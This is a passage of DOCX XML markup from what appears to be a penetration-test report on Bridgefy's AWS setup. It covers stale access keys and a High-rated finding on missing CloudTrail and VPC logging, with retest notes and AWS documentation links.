          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>old</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:hyperlink r:id="rId225">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/iamv2/home?#/credential_report</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="105"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487625728">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1450759</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>228060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5394304" cy="548639"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="99" name="Image 99"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="99" name="Image 99"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId227" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394304" cy="548639"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="135"/>
        <w:ind w:left="0" w:right="363" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>old</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to implement a reasonable access key rotation strategy and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>configure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>detect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>old</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>150</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>further</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>advised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>use short-lived temporary tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>151</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> instead of long-living access keys. Such configuration can be improved further by enforcing MFA for API access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>152</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250022" w:id="33"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-028</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Insufficient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Logging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Partially Fixed. Bridgefy enabled CloudTrail and VPC logs for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>745354931789 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS Account. It is recommended to export log groups for archivization and enable CloudTrail and VPC logs on the other affected AWS account as well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that AWS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CloudTrail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>153</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> is not enabled for any regions. This tool records all activities in an AWS account as events. Without adequate logging,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>impossible to monitor malicious activities, or use integrated tools that analyze </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>CloudTrail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>for anomalies, all of which may be critical in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>breach.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Additionally,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the Bridgefy AWS accounts in scope contain multiple components without any logging configuration, and fail to implement centralized logging structures. It should be further noted that no documentation was identified relating to logging or monitoring during this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="13"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487626240">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>111923</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="100" name="Graphic 100"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="100" name="Graphic 100"/>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8.812894pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15690240;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape76" coordorigin="1440,176" coordsize="2880,0" path="m1440,176l4320,176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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>150</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="70"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId228">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/accounts/latest/reference/credentials-access-keys-best-(...).html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>151</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId229">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>152</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="59"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId230">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/premiumsupport/knowledge-center/authenticate-mfa-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
